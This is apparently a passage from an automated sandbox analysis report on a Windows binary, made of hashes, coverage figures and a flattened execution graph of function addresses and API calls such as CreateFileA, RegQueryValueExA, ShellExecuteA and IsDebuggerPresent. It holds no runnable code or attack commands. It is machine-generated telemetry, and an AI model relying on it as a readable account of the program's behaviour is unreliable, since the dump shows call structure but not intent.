                                                                                                                                    • Instruction ID: 41dab6ff28bf4c48c80b7d4fe62f18fd1ff32017a734059296a2bd387a42c2bf
                                                                                                                                    • Opcode Fuzzy Hash: dc021efed5507b4fb83a724604d938c0a9f009831836a325e097d52029dd6aec
                                                                                                                                    • Instruction Fuzzy Hash: 03C00231811038FFCF122B67FC4494D3F66EB462603254C7AE1085203086A11C61EFEB
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:6.2%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:4.2%
                                                                                                                                    Total number of Nodes:1710
                                                                                                                                    Total number of Limit Nodes:44
                                                                                                                                    execution_graph 28150 11009500 267 API calls 28151 11009900 WriteFile CloseHandle 28329 1100d300 372 API calls 28152 11010500 67 API calls 28153 11016500 279 API calls 28333 11010f00 281 API calls int 28335 1115cb10 277 API calls 28340 1116a318 74 API calls 28155 1100a110 270 API calls 28156 1100dd10 85 API calls 28341 1100ab10 85 API calls 28342 11001f10 273 API calls 28158 11016910 265 API calls 28343 11016310 EndDialog 28344 11014310 264 API calls 28346 11009f11 82 API calls 28161 11001120 263 API calls 28350 11016f20 91 API calls 28351 11167f30 6 API calls 28167 1100892b 547 API calls 28169 11002130 263 API calls 28353 11001b30 6 API calls 27811 11015530 LoadLibraryA 28172 1101b530 281 API calls 28174 11009940 LoadLibraryA 28358 11009740 272 API calls 28359 11006f40 10 API calls 28176 1101a940 265 API calls 28360 11013340 286 API calls 28178 1109e140 WaitForSingleObject SetEvent 28180 110cb940 282 API calls 28184 11001d50 263 API calls 28185 11010d50 284 API calls 28367 1101cb50 301 API calls 28187 1101ad54 268 API calls 28369 11008359 80 API calls 28371 11001b60 263 API calls 28372 1105ab60 271 API calls 28373 11016766 280 API calls 28195 11001170 267 API calls 28375 11009370 356 API calls 28376 11007f70 409 API calls 28196 11016d70 268 API calls 28198 11113160 FindWindowA SendMessageA 28202 1101cd70 290 API calls 28378 1105ef70 270 API calls 26101 11015580 CreateFileA 26102 110155a2 CloseHandle 26101->26102 26103 110155ae 26101->26103 26102->26103 28207 11027580 6 API calls 27616 11031780 27617 1103178e 27616->27617 27618 11146a90 264 API calls 27617->27618 27619 1103179f SetUnhandledExceptionFilter 27618->27619 27620 110317af 27619->27620 28208 11146190 305 API calls 28210 1100e190 EnterCriticalSection int 28382 11001b90 263 API calls 28383 11143780 86 API calls 28214 110011a0 262 API calls 28384 1100c7a0 334 API calls 28387 110153a0 263 API calls 28389 1101bba0 GetSystemPowerStatus 28390 110097ae 270 API calls 28391 11005bb0 275 API calls 28392 110053b0 279 API calls 28393 110017b0 InterlockedIncrement InterlockedDecrement 28394 1100abb0 LeaveCriticalSection 28398 110163b0 272 API calls 28221 1105e9b0 79 API calls 28222 1100d9c0 EnterCriticalSection LeaveCriticalSection int 28223 11015dc1 263 API calls 28403 11004bc0 267 API calls 26104 110155c0 26111 110155f6 26104->26111 26105 11015670 wsprintfA 26105->26111 26106 1101575d 26114 11162bb7 26106->26114 26107 110ed520 8 API calls 26107->26111 26109 11015777 26110 110156c3 RegQueryValueExA 26110->26111 26111->26105 26111->26106 26111->26107 26111->26110 26113 11129e00 85 API calls 26111->26113 26113->26111 26115 11162bc1 IsDebuggerPresent 26114->26115 26116 11162bbf 26114->26116 26122 111784f7 26115->26122 26116->26109 26119 1116cb59 SetUnhandledExceptionFilter UnhandledExceptionFilter 26120 1116cb76 26119->26120 26121 1116cb7e GetCurrentProcess TerminateProcess 26119->26121 26120->26121 26121->26109 26122->26119 28225 110181d0 88 API calls 28227 11013dd0 22 API calls 28407 110173d0 GetProcAddress SetLastError 28410 1101abd2 DeleteCriticalSection 27877 1116a5cd 27878 1116a5dd 27877->27878 27879 1116a5d8 27877->27879 27883 1116a4d7 27878->27883 27895 11177f37 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 27879->27895 27882 1116a5eb 27884 1116a4e3 27883->27884 27885 1116a580 27884->27885 27889 1116a530 27884->27889 27896 1116a373 27884->27896 27885->27882 27888 1116a543 27890 1116a560 27888->27890 27891 11026410 7 API calls 27888->27891 27889->27885 27946 11026410 27889->27946 27890->27885 27892 1116a373 148 API calls 27890->27892 27893 1116a557 27891->27893 27892->27885 27894 1116a373 148 API calls 27893->27894 27894->27890 27895->27878 27897 1116a37f 27896->27897 27898 1116a387 27897->27898 27899 1116a401 27897->27899 27955 1116e390 HeapCreate 27898->27955 27901 1116a407 27899->27901 27902 1116a462 27899->27902 27907 1116a425 27901->27907 27914 1116a390 27901->27914 28043 1116e65b 66 API calls 27901->28043 27903 1116a467 27902->27903 27904 1116a4c0 27902->27904 27906 1116c4ba 3 API calls 27903->27906 27904->27914 28049 1116c7be 79 API calls 27904->28049 27905 1116a38c 27905->27914 27956 1116c82c GetModuleHandleW 27905->27956 27909 1116a46c 27906->27909 27912 1116a439 27907->27912 28044 1117226e 67 API calls 27907->28044 27915 1116ac7e 66 API calls 27909->27915 28047 1116a44c 69 API calls 27912->28047 27914->27889 27918 1116a478 27915->27918 27916 1116a39c 27919 1116a3a0 27916->27919 27924 1116a3ac GetCommandLineA 27916->27924 27918->27914 27921 1116a484 DecodePointer 27918->27921 28040 1116e3ae HeapDestroy 27919->28040 27920 1116a42f 28045 1116c50b 69 API calls 27920->28045 27928 1116a499 27921->27928 27981 11177e54 GetEnvironmentStringsW 27924->27981 27925 1116a434 28046 1116e3ae HeapDestroy 27925->28046 27930 1116a4b4 27928->27930 27931 1116a49d 27928->27931 27932 11163aa5 66 API calls 27930->27932 28048 1116c548 66 API calls 27931->28048 27932->27914 27936 1116a4a4 GetCurrentThreadId 27936->27914 27937 1116a3ca 28041 1116c50b 69 API calls 27937->28041 27941 1116a3ea 27941->27914 28042 1117226e 67 API calls 27941->28042 27947 111104e0 27946->27947 27948 11110501 27947->27948 27949 111104ec 27947->27949 27950 11110514 27947->27950 28134 11110430 27948->28134 27949->27950 27952 11110430 7 API calls 27949->27952 27950->27888 27954 111104f5 27952->27954 27953 11110508 27953->27888 27954->27888 27955->27905 27957 1116c840 27956->27957 27958 1116c849 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27956->27958 28050 1116c50b 69 API calls 27957->28050 27960 1116c893 TlsAlloc 27958->27960 27963 1116c9a2 27960->27963 27964 1116c8e1 TlsSetValue 27960->27964 27962 1116c845 27962->27916 27963->27916 27964->27963 27965 1116c8f2 27964->27965 28051 1116e417 RtlEncodePointer EncodePointer 27965->28051 27967 1116c8f7 EncodePointer EncodePointer EncodePointer EncodePointer 28052 11174425 InitializeCriticalSectionAndSpinCount 27967->28052 27969 1116c936 27970 1116c99d 27969->27970 27971 1116c93a DecodePointer 27969->27971 28054 1116c50b 69 API calls 27970->28054 27973 1116c94f 27971->27973 27973->27970 27974 1116ac7e 66 API calls 27973->27974 27975 1116c965 27974->27975 27975->27970 27976 1116c96d DecodePointer 27975->27976 27977 1116c97e 27976->27977 27977->27970 27978 1116c982 27977->27978 28053 1116c548 66 API calls 27978->28053 27980 1116c98a GetCurrentThreadId 27980->27963 27983 11177e70 27981->27983 27986 1116a3bc 27981->27986 27982 11177e85 WideCharToMultiByte 27984 11177ea5 27982->27984 27985 11177edd FreeEnvironmentStringsW 27982->27985 27983->27982 27983->27983 27987 1116ac39 66 API calls 27984->27987 27985->27986 27994 11172029 GetStartupInfoW 27986->27994 27988 11177eab 27987->27988 27988->27985 27989 11177eb3 WideCharToMultiByte 27988->27989 27990 11177ec5 27989->27990 27991 11177ed1 FreeEnvironmentStringsW 27989->27991 27992 11163aa5 66 API calls 27990->27992 27991->27986 27993 11177ecd 27992->27993 27993->27991 27995 1116ac7e 66 API calls 27994->27995 27997 11172047 27995->27997 27996 111721bc 27998 111721f2 GetStdHandle 27996->27998 27999 11172256 SetHandleCount 27996->27999 28002 11172204 GetFileType 27996->28002 28006 1117222a InitializeCriticalSectionAndSpinCount 27996->28006 27997->27996 28000 1116ac7e 66 API calls 27997->28000 28001 1116a3c6 27997->28001 28003 1117213c 27997->28003 27998->27996 27999->28001 28000->27997 28001->27937 28007 11177d99 28001->28007 28002->27996 28003->27996 28004 11172173 InitializeCriticalSectionAndSpinCount 28003->28004 28005 11172168 GetFileType 28003->28005 28004->28001 28004->28003 28005->28003 28005->28004 28006->27996 28006->28001 28008 11177db3 GetModuleFileNameA 28007->28008 28009 11177dae 28007->28009 28011 11177dda 28008->28011 28061 11171a45 94 API calls 28009->28061 28055 11177bff 28011->28055 28013 1116a3d6 28013->27941 28018 11177b23 28013->28018 28015 1116ac39 66 API calls 28016 11177e1c 28015->28016 28016->28013 28017 11177bff 76 API calls 28016->28017 28017->28013 28019 11177b2c 28018->28019 28023 11177b31 28018->28023 28063 11171a45 94 API calls 28019->28063 28021 1116a3df 28021->27941 28034 1116e46e 28021->28034 28022 1116ac7e 66 API calls 28024 11177b66 28022->28024 28023->28021 28023->28022 28024->28021 28025 11177bb5 28024->28025 28027 1116ac7e 66 API calls 28024->28027 28028 11177bdb 28024->28028 28030 1116cd5f 66 API calls 28024->28030 28031 11177bf2 28024->28031 28026 11163aa5 66 API calls 28025->28026 28026->28021 28027->28024 28029 11163aa5 66 API calls 28028->28029 28029->28021 28030->28024 28032 1116ed72 10 API calls 28031->28032 28033 11177bfe 28032->28033 28035 1116e47c 28034->28035 28064 1116d88b 28035->28064 28037 1116e49a 28039 1116e4bb 28037->28039 28067 11163dd5 28037->28067 28039->27941 28040->27914 28041->27919 28042->27937 28043->27907 28044->27920 28045->27925 28046->27912 28047->27914 28048->27936 28049->27914 28050->27962 28051->27967 28052->27969 28053->27980 28054->27963 28057 11177c1e 28055->28057 28059 11177c8b 28057->28059 28062 11177590 76 API calls 28057->28062 28058 11177d89 28058->28013 28058->28015 28059->28058 28060 11177590 76 API calls 28059->28060 28060->28059 28061->28008 28062->28057 28063->28023 28065 1116d891 RtlEncodePointer 28064->28065 28065->28065 28066 1116d8ab 28065->28066 28066->28037 28070 11163d99 28067->28070 28069 11163de2 28069->28039 28071 11163da5 28070->28071 28078 1116e405 28071->28078 28077 11163dc6 28077->28069 28079 1117459f 66 API calls 28078->28079 28080 11163daa 28079->28080 28081 11163cb2 RtlDecodePointer DecodePointer 28080->28081 28082 11163ce0 28081->28082 28083 11163d61 28081->28083 28082->28083 28093 1116fe8f 28082->28093 28092 11163dcf LeaveCriticalSection 28083->28092 28085 11163cf2 28086 11163d44 EncodePointer EncodePointer 28085->28086 28087 11163d16 28085->28087 28100 1116acca 28085->28100 28086->28083 28087->28083 28089 1116acca 70 API calls 28087->28089 28090 11163d32 EncodePointer 28087->28090 28091 11163d2c 28089->28091 28090->28086 28091->28083 28091->28090 28092->28077 28094 1116feaf HeapSize 28093->28094 28095 1116fe9a 28093->28095 28094->28085 28106 1116a1af 66 API calls 28095->28106 28097 1116fe9f 28107 1116edc4 11 API calls 28097->28107 28099 1116feaa 28099->28085 28101 1116acd3 28100->28101 28103 1116ad12 28101->28103 28104 1116acf3 Sleep 28101->28104 28108 11163964 28101->28108 28103->28087 28105 1116ad08 28104->28105 28105->28101 28105->28103 28106->28097 28107->28099 28109 1116396f 28108->28109 28110 1116397a 28108->28110 28112 11163a11 66 API calls 28109->28112 28111 11163982 28110->28111 28121 1116398f 28110->28121 28113 11163aa5 66 API calls 28111->28113 28114 11163977 28112->28114 28128 1116398a 28113->28128 28114->28101 28115 111639c7 28130 1116e368 DecodePointer 28115->28130 28116 11163997 RtlReAllocateHeap 28116->28121 28116->28128 28118 111639cd 28131 1116a1af 66 API calls 28118->28131 28120 111639f7 28133 1116a1af 66 API calls 28120->28133 28121->28115 28121->28116 28121->28120 28125 111639df 28121->28125 28129 1116e368 DecodePointer 28121->28129 28124 111639fc GetLastError 28124->28128 28132 1116a1af 66 API calls 28125->28132 28127 111639e4 GetLastError 28127->28128 28128->28101 28129->28121 28130->28118 28131->28128 28132->28127 28133->28124 28135 11110474 EnterCriticalSection 28134->28135 28136 1111045f InitializeCriticalSection 28134->28136 28138 11110495 28135->28138 28136->28135 28137 111104c3 LeaveCriticalSection 28137->27953 28138->28137 28140 111103d0 GetCurrentThreadId EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 28138->28140 28140->28138 28229 110011e0 DefWindowProcA 28230 1100a5e0 GetTickCount 28231 11001de0 263 API calls 28413 1110f3f0 94 API calls 28232 110149e0 SendMessageA 26123 110179e0 GetTickCount 26130 110178f0 26123->26130 26129 11017a27 26131 11017910 26130->26131 26132 110179c6 26130->26132 26133 11017932 CoInitialize _GetRawWMIStringW 26131->26133 26135 11017929 WaitForSingleObject 26131->26135 26134 11162bb7 5 API calls 26132->26134 26136 110179b2 26133->26136 26139 11017965 26133->26139 26137 110179d5 26134->26137 26135->26133 26136->26132 26138 110179c0 CoUninitialize 26136->26138 26143 11017810 26137->26143 26138->26132 26139->26136 26140 110179ac 26139->26140 26157 111648ed 26139->26157 26162 111646f7 67 API calls 26140->26162 26144 11017830 26143->26144 26145 110178d6 26143->26145 26146 11017848 CoInitialize _GetRawWMIStringW 26144->26146 26148 1101783f WaitForSingleObject 26144->26148 26147 11162bb7 5 API calls 26145->26147 26149 1101787b 26146->26149 26152 110178c2 26146->26152 26150 110178e5 SetEvent GetTickCount 26147->26150 26148->26146 26149->26152 26153 110178bc 26149->26153 26155 111648ed 79 API calls 26149->26155 26156 11147060 21 API calls 26150->26156 26151 110178d0 CoUninitialize 26151->26145 26152->26145 26152->26151 26164 111646f7 67 API calls 26153->26164 26155->26149 26156->26129 26158 1116490d 26157->26158 26159 111648fb 26157->26159 26163 1116489c 79 API calls 26158->26163 26159->26139 26161 11164917 26161->26139 26162->26136 26163->26161 26164->26152 28415 110157e0 268 API calls 28417 11119bf0 55 API calls 26610 11027de0 26626 111457a0 26610->26626 26614 11027e1e 26615 11027e3d 26614->26615 26616 111457a0 259 API calls 26614->26616 26661 11145ef0 26615->26661 26618 11027e2b wsprintfA 26616->26618 26618->26615 26619 11027e47 26620 11162bb7 5 API calls 26619->26620 26621 11027e53 26620->26621 26623 11027e74 ShellExecuteA 26624 11162bb7 5 API calls 26623->26624 26625 11027ea0 26624->26625 26627 111457c2 26626->26627 26631 111457d9 26626->26631 26689 11029a70 262 API calls 26627->26689 26630 11145967 26632 11162bb7 5 API calls 26630->26632 26631->26630 26633 1114580c GetModuleFileNameA 26631->26633 26634 11027dfb wsprintfA 26632->26634 26664 11081e00 26633->26664 26650 11143e00 26634->26650 26636 11145821 26637 11145831 SHGetFolderPathA 26636->26637 26649 11145918 26636->26649 26639 1114585e 26637->26639 26640 1114587d SHGetFolderPathA 26637->26640 26639->26640 26643 11145864 26639->26643 26642 111458b2 26640->26642 26668 1102ad70 26642->26668 26690 11029a70 262 API calls 26643->26690 26647 111458c3 26647->26647 26671 11145240 26647->26671 26649->26649 26691 11142e60 26649->26691 26651 11143e21 CreateFileA 26650->26651 26653 11143ebe FindCloseChangeNotification 26651->26653 26654 11143e9e 26651->26654 26657 11162bb7 5 API calls 26653->26657 26655 11143ea2 CreateFileA 26654->26655 26656 11143edb 26654->26656 26655->26653 26655->26656 26659 11162bb7 5 API calls 26656->26659 26658 11143ed7 26657->26658 26658->26614 26660 11143eea 26659->26660 26660->26614 27321 11145c70 26661->27321 26663 11027e42 26663->26619 26663->26623 26665 11081e13 26664->26665 26667 11081e2a 26665->26667 26700 11081c50 IsDBCSLeadByte 26665->26700 26667->26636 26701 11028c10 26668->26701 26670 1102ad7e 26670->26647 26672 111452ca 26671->26672 26673 1114524b 26671->26673 26672->26649 26673->26672 26674 1114525b GetFileAttributesA 26673->26674 26675 11145275 26674->26675 26676 11145267 26674->26676 27304 11164bb8 26675->27304 26676->26649 26679 11081e00 IsDBCSLeadByte 26680 11145286 26679->26680 26681 11145240 67 API calls 26680->26681 26687 111452a3 26680->26687 26682 11145296 26681->26682 26683 111452ac 26682->26683 26684 1114529e 26682->26684 26685 11163aa5 66 API calls 26683->26685 26686 11163aa5 66 API calls 26684->26686 26688 111452b1 CreateDirectoryA 26685->26688 26686->26687 26687->26649 26688->26687 26692 11142e6a 26691->26692 26693 11142e6c 26691->26693 26692->26630 27312 11110230 26693->27312 26695 11142e92 26696 11142e9b 26695->26696 26697 11142eb9 26695->26697 26696->26630 27319 11029a70 262 API calls 26697->27319 26700->26667 26702 11028c33 26701->26702 26703 1102927b 26701->26703 26704 11028cf0 GetModuleFileNameA 26702->26704 26713 11028c68 26702->26713 26706 11029317 26703->26706 26707 1102932a 26703->26707 26705 11028d11 26704->26705 26731 11164ead 26705->26731 26709 11162bb7 5 API calls 26706->26709 26708 11162bb7 5 API calls 26707->26708 26710 1102933b 26708->26710 26712 11029326 26709->26712 26710->26670 26712->26670 26715 11164ead 140 API calls 26713->26715 26714 11028ceb 26714->26703 26734 11026ef0 26714->26734 26715->26714 26717 11028d64 26727 110291e5 26717->26727 26750 11163ca7 26717->26750 26722 11028da0 26723 11026ef0 80 API calls 26722->26723 26724 11028db0 26723->26724 26725 11026ef0 80 API calls 26724->26725 26724->26727 26729 11028dd3 26725->26729 26727->26727 26737 11164c77 26727->26737 26728 11026ef0 80 API calls 26728->26729 26729->26727 26729->26728 26730 1116558e 85 API calls 26729->26730 26755 11026d60 66 API calls 26729->26755 26730->26729 26756 11164df1 26731->26756 26733 11164ebf 26733->26714 27098 1116535d 26734->27098 26736 11026ef9 26736->26717 26738 11164c83 26737->26738 26739 11164c95 26738->26739 26740 11164caa 26738->26740 27229 1116a1af 66 API calls 26739->27229 26742 1116be59 67 API calls 26740->26742 26746 11164ca5 26740->26746 26744 11164cc3 26742->26744 26743 11164c9a 27230 1116edc4 11 API calls 26743->27230 27213 11164c0a 26744->27213 26746->26703 26751 11163c91 26750->26751 27275 1116450b 26751->27275 26754 11026d60 66 API calls 26754->26722 26755->26729 26758 11164dfd 26756->26758 26757 11164e10 26814 1116a1af 66 API calls 26757->26814 26758->26757 26761 11164e3d 26758->26761 26760 11164e15 26815 1116edc4 11 API calls 26760->26815 26775 11172558 26761->26775 26764 11164e42 26765 11164e56 26764->26765 26766 11164e49 26764->26766 26768 11164e7d 26765->26768 26769 11164e5d 26765->26769 26816 1116a1af 66 API calls 26766->26816 26792 111722c1 26768->26792 26817 1116a1af 66 API calls 26769->26817 26771 11164e20 26771->26733 26776 11172564 26775->26776 26777 1117459f 66 API calls 26776->26777 26790 11172572 26777->26790 26778 111725e7 26819 11172682 26778->26819 26779 111725ee 26781 1116ac39 66 API calls 26779->26781 26783 111725f5 26781->26783 26782 11172677 26782->26764 26783->26778 26784 11172603 InitializeCriticalSectionAndSpinCount 26783->26784 26786 11172636 EnterCriticalSection 26784->26786 26787 11172623 26784->26787 26786->26778 26789 11163aa5 66 API calls 26787->26789 26788 111744dd 66 API calls 26788->26790 26789->26778 26790->26778 26790->26779 26790->26788 26822 1116be9a 67 API calls 26790->26822 26823 1116bf08 LeaveCriticalSection LeaveCriticalSection 26790->26823 26793 111722e3 26792->26793 26794 111722f7 26793->26794 26806 1117230e 26793->26806 26828 1116a1af 66 API calls 26794->26828 26795 111724ab 26798 11172511 26795->26798 26799 111724ff 26795->26799 26797 111722fc 26829 1116edc4 11 API calls 26797->26829 26825 1117a5c3 26798->26825 26834 1116a1af 66 API calls 26799->26834 26803 11172504 26835 1116edc4 11 API calls 26803->26835 26804 11164e88 26818 11164ea3 LeaveCriticalSection LeaveCriticalSection 26804->26818 26806->26795 26806->26799 26830 1117a94d 76 API calls 26806->26830 26808 1117247a 26808->26799 26831 1117a7e7 85 API calls 26808->26831 26810 111724a4 26810->26795 26832 1117a7e7 85 API calls 26810->26832 26812 111724c3 26812->26795 26833 1117a7e7 85 API calls 26812->26833 26814->26760 26815->26771 26816->26771 26817->26771 26818->26771 26824 111744c6 LeaveCriticalSection 26819->26824 26821 11172689 26821->26782 26822->26790 26823->26790 26824->26821 26836 1117a4ff 26825->26836 26827 1117a5de 26827->26804 26828->26797 26829->26804 26830->26808 26831->26810 26832->26812 26833->26795 26834->26803 26835->26804 26838 1117a50b 26836->26838 26837 1117a51e 26956 1116a1af 66 API calls 26837->26956 26838->26837 26840 1117a554 26838->26840 26847 11179dcb 26840->26847 26841 1117a523 26957 1116edc4 11 API calls 26841->26957 26844 1117a56e 26958 1117a595 LeaveCriticalSection 26844->26958 26846 1117a52d 26846->26827 26848 11179df2 26847->26848 26959 1117d375 26848->26959 26850 1116ed72 10 API calls 26853 1117a4fe 26850->26853 26851 11179e4d 26984 1116a1c2 66 API calls 26851->26984 26855 1117a51e 26853->26855 26859 1117a554 26853->26859 26854 11179e52 26985 1116a1af 66 API calls 26854->26985 27095 1116a1af 66 API calls 26855->27095 26856 11179e0e 26856->26851 26861 11179ea8 26856->26861 26954 1117a07d 26856->26954 26864 11179dcb 117 API calls 26859->26864 26860 11179e5c 26986 1116edc4 11 API calls 26860->26986 26863 11179f2f 26861->26863 26869 11179f02 26861->26869 26862 1117a523 27096 1116edc4 11 API calls 26862->27096 26987 1116a1c2 66 API calls 26863->26987 26868 1117a56e 26864->26868 27097 1117a595 LeaveCriticalSection 26868->27097 26966 1117798a 26869->26966 26870 11179f34 26988 1116a1af 66 API calls 26870->26988 26873 11179f3e 26989 1116edc4 11 API calls 26873->26989 26874 1117a52d 26874->26844 26877 11179e66 26877->26844 26878 11179fc0 26879 11179fea CreateFileA 26878->26879 26880 11179fc9 26878->26880 26881 1117a087 GetFileType 26879->26881 26882 1117a017 26879->26882 26990 1116a1c2 66 API calls 26880->26990 26885 1117a094 GetLastError 26881->26885 26886 1117a0d8 26881->26886 26884 1117a050 GetLastError 26882->26884 26888 1117a02b CreateFileA 26882->26888 26993 1116a1d5 66 API calls 26884->26993 26995 1116a1d5 66 API calls 26885->26995 26997 11177754 67 API calls 26886->26997 26887 11179fce 26991 1116a1af 66 API calls 26887->26991 26888->26881 26888->26884 26892 1117a0bd CloseHandle 26894 1117a077 26892->26894 26895 1117a0cb 26892->26895 26893 11179fd8 26992 1116a1af 66 API calls 26893->26992 26994 1116a1af 66 API calls 26894->26994 26996 1116a1af 66 API calls 26895->26996 26899 1117a0f6 26902 1117a30c 26899->26902 26903 1117a14c 26899->26903 26905 1117a1bb 26899->26905 26901 1117a0d0 26901->26894 26906 1117a474 CloseHandle CreateFileA 26902->26906 26902->26954 26998 11175746 68 API calls 26903->26998 26905->26902 26917 1117a315 26905->26917 26926 1117a265 26905->26926 26910 1117a4cf 26906->26910 26911 1117a4a1 GetLastError 26906->26911 26907 1117a156 26908 1117a15f 26907->26908 26909 1117a178 26907->26909 26999 1116a1c2 66 API calls 26908->26999 27015 11175099 26909->27015 26910->26954 27093 1116a1d5 66 API calls 26911->27093 26915 1117a4ad 27094 111777d5 67 API calls 26915->27094 26916 1117a164 26916->26905 26920 1117a16c 26916->26920 26917->26902 26928 1117a332 26917->26928 26930 1117a289 26917->26930 27000 11171dc8 26920->27000 26921 1117a2dd 26923 11175099 75 API calls 26921->26923 26922 1117a1a2 26922->26920 27084 11175746 68 API calls 26922->27084 26936 1117a2ea 26923->26936 26926->26902 26926->26921 26926->26930 26931 1117a2b4 26926->26931 27087 11176489 68 API calls 26928->27087 26930->26902 26930->26920 27092 111730a4 95 API calls 26930->27092 27085 11176489 68 API calls 26931->27085 26932 1117a33d 26932->26930 26939 1117a348 26932->26939 26934 1117a373 26942 11171dc8 69 API calls 26934->26942 26935 1117a38d 26937 1117a3af 26935->26937 26943 1117a394 26935->26943 26936->26902 26936->26920 26936->26934 26936->26935 26936->26937 27091 11175746 68 API calls 26937->27091 27088 11176489 68 API calls 26939->27088 26946 1117a37a 26942->26946 27090 11175746 68 API calls 26943->27090 26944 1117a2bf 26944->26930 26948 1117a2c6 26944->26948 26945 1117a352 26945->26902 26945->26920 27089 1116a1af 66 API calls 26946->27089 27086 11176489 68 API calls 26948->27086 26952 1117a39e 26952->26920 26955 1117a3a9 26952->26955 26953 1117a2d0 26953->26920 26953->26921 26954->26850 26955->26902 26956->26841 26957->26846 26958->26846 26960 1117d396 26959->26960 26961 1117d381 26959->26961 26960->26856 26962 1116a1af 66 API calls 26961->26962 26963 1117d386 26962->26963 26964 1116edc4 11 API calls 26963->26964 26965 1117d391 26964->26965 26965->26856 26967 11177996 26966->26967 26968 111744dd 66 API calls 26967->26968 26969 111779a6 26968->26969 26970 1117459f 66 API calls 26969->26970 26971 111779ab 26969->26971 26980 111779ba 26970->26980 26971->26878 26972 11177b1a LeaveCriticalSection 26972->26971 26973 11177a92 26974 1116ac7e 66 API calls 26973->26974 26975 11177a9b 26974->26975 26981 111778c4 68 API calls 26975->26981 26983 11177afc 26975->26983 26976 1117459f 66 API calls 26976->26980 26977 11177a3a EnterCriticalSection 26978 11177a4a LeaveCriticalSection 26977->26978 26977->26980 26978->26980 26979 11177a10 InitializeCriticalSectionAndSpinCount 26979->26980 26980->26973 26980->26976 26980->26977 26980->26979 26982 11177a5c LeaveCriticalSection 26980->26982 26980->26983 26981->26983 26982->26980 26983->26972 26984->26854 26985->26860 26986->26877 26987->26870 26988->26873 26989->26877 26990->26887 26991->26893 26992->26877 26993->26894 26994->26954 26995->26892 26996->26901 26997->26899 26998->26907 26999->26916 27001 1117785b 66 API calls 27000->27001 27004 11171dd8 27001->27004 27002 11171e2e 27003 111777d5 67 API calls 27002->27003 27006 11171e36 27003->27006 27004->27002 27005 11171e0c 27004->27005 27007 1117785b 66 API calls 27004->27007 27005->27002 27008 1117785b 66 API calls 27005->27008 27009 11171e58 27006->27009 27013 1116a1d5 66 API calls 27006->27013 27010 11171e03 27007->27010 27011 11171e18 FindCloseChangeNotification 27008->27011 27009->26894 27014 1117785b 66 API calls 27010->27014 27011->27002 27012 11171e24 GetLastError 27011->27012 27012->27002 27013->27009 27014->27005 27016 111750b5 27015->27016 27017 111750d0 27015->27017 27019 1116a1c2 66 API calls 27016->27019 27018 111750df 27017->27018 27020 111750fe 27017->27020 27021 1116a1c2 66 API calls 27018->27021 27022 111750ba 27019->27022 27024 1117511c 27020->27024 27035 11175130 27020->27035 27023 111750e4 27021->27023 27025 1116a1af 66 API calls 27022->27025 27026 1116a1af 66 API calls 27023->27026 27027 1116a1c2 66 API calls 27024->27027 27036 111750c2 27025->27036 27029 111750eb 27026->27029 27031 11175121 27027->27031 27028 11175186 27030 1116a1c2 66 API calls 27028->27030 27032 1116edc4 11 API calls 27029->27032 27033 1117518b 27030->27033 27034 1116a1af 66 API calls 27031->27034 27032->27036 27037 1116a1af 66 API calls 27033->27037 27038 11175128 27034->27038 27035->27028 27035->27036 27039 11175165 27035->27039 27040 1117519f 27035->27040 27036->26922 27083 1117d104 98 API calls 27036->27083 27037->27038 27041 1116edc4 11 API calls 27038->27041 27039->27028 27044 11175170 ReadFile 27039->27044 27042 1116ac39 66 API calls 27040->27042 27041->27036 27045 111751b5 27042->27045 27046 11175613 GetLastError 27044->27046 27047 1117529b 27044->27047 27048 111751bf 27045->27048 27049 111751dd 27045->27049 27050 1117549a 27046->27050 27051 11175620 27046->27051 27047->27046 27054 111752af 27047->27054 27052 1116a1af 66 API calls 27048->27052 27055 11176489 68 API calls 27049->27055 27058 1116a1d5 66 API calls 27050->27058 27063 1117541f 27050->27063 27053 1116a1af 66 API calls 27051->27053 27056 111751c4 27052->27056 27057 11175625 27053->27057 27054->27063 27064 111752cb 27054->27064 27066 111754df 27054->27066 27059 111751eb 27055->27059 27060 1116a1c2 66 API calls 27056->27060 27061 1116a1c2 66 API calls 27057->27061 27058->27063 27059->27044 27060->27036 27061->27063 27062 11163aa5 66 API calls 27062->27036 27063->27036 27063->27062 27065 1117532f ReadFile 27064->27065 27070 111753ac 27064->27070 27069 1117534d GetLastError 27065->27069 27073 11175357 27065->27073 27066->27063 27067 11175554 ReadFile 27066->27067 27068 11175573 GetLastError 27067->27068 27074 1117557d 27067->27074 27068->27066 27068->27074 27069->27064 27069->27073 27070->27063 27071 11175427 27070->27071 27072 1117541a 27070->27072 27078 111753e4 27070->27078 27077 1117545e 27071->27077 27071->27078 27076 1116a1af 66 API calls 27072->27076 27073->27064 27079 11176489 68 API calls 27073->27079 27074->27066 27080 11176489 68 API calls 27074->27080 27075 11175494 GetLastError 27075->27050 27076->27063 27081 11176489 68 API calls 27077->27081 27078->27063 27078->27075 27079->27073 27080->27074 27082 1117546d 27081->27082 27082->27078 27083->26922 27084->26916 27085->26944 27086->26953 27087->26932 27088->26945 27089->26954 27090->26952 27091->26945 27092->26930 27093->26915 27094->26910 27095->26862 27096->26874 27097->26874 27100 11165369 27098->27100 27099 1116537c 27143 1116a1af 66 API calls 27099->27143 27100->27099 27102 111653ad 27100->27102 27107 1116538c 27102->27107 27117 1116be59 27102->27117 27103 11165381 27144 1116edc4 11 API calls 27103->27144 27107->26736 27111 11165431 27112 1116545e 27111->27112 27123 11172885 27111->27123 27154 1116548d LeaveCriticalSection LeaveCriticalSection 27112->27154 27114 111653cc 27114->27111 27152 1116a1af 66 API calls 27114->27152 27115 11165426 27153 1116edc4 11 API calls 27115->27153 27118 1116be8d EnterCriticalSection 27117->27118 27119 1116be6b 27117->27119 27121 111653bb 27118->27121 27119->27118 27120 1116be73 27119->27120 27122 1117459f 66 API calls 27120->27122 27121->27111 27145 1116a147 27121->27145 27122->27121 27124 11172892 27123->27124 27128 111728a7 27123->27128 27188 1116a1af 66 API calls 27124->27188 27126 11172897 27189 1116edc4 11 API calls 27126->27189 27129 111728dc 27128->27129 27136 111728a2 27128->27136 27155 11177ff0 27128->27155 27131 1116a147 66 API calls 27129->27131 27132 111728f0 27131->27132 27158 11175650 27132->27158 27134 111728f7 27135 1116a147 66 API calls 27134->27135 27134->27136 27137 1117291a 